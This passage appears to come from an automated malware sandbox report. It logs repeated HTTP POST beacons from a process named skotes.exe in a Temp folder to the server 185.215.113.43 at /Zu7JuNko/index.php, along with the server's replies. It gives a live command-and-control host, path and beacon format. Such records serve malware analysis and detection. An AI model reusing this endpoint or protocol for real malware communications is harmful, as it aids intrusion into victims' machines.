                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 10:34:54.654522896 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  48192.168.2.664738185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:55.961628914 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:34:56.657454014 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:56 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  49192.168.2.664739185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:58.299513102 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:34:58.997339964 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  50192.168.2.664740185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:00.507788897 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:35:01.349664927 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  51192.168.2.664741185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:02.975737095 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:35:03.680735111 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:03 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  52192.168.2.664742185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:05.196363926 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:35:05.926621914 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  53192.168.2.664743185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:07.732815981 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:35:10.038031101 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 10:35:10.038094044 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 10:35:10.038131952 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 10:35:10.038448095 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  54192.168.2.664744185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:11.554435015 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:35:12.384273052 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  55192.168.2.664745185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:14.358572006 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:35:15.128725052 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  56192.168.2.664746185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:17.177881956 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:35:18.574829102 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0
                  Sep 25, 2024 10:35:18.575447083 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0
                  Sep 25, 2024 10:35:18.575536966 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  57192.168.2.664747185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:20.213939905 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:35:20.941566944 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  58192.168.2.664748185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:22.460431099 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:35:23.164721966 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:23 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  59192.168.2.664749185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:24.805017948 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:35:25.505697966 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  60192.168.2.664750185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:27.059201956 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:35:27.761306047 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:27 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  61192.168.2.664752185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:29.397823095 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:35:30.303122044 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:29 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  62192.168.2.664753185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:31.819139957 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:35:32.615470886 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  63192.168.2.664754185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:34.241924047 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:35:34.937264919 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  64192.168.2.664755185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:36.459683895 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:35:37.158345938 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:37 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  65192.168.2.664756185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:38.788053989 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:35:39.515770912 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  66192.168.2.664757185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:41.224195957 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:35:41.917973042 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  67192.168.2.664758185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:43.556926966 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:35:44.267358065 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:44 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  68192.168.2.664759185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
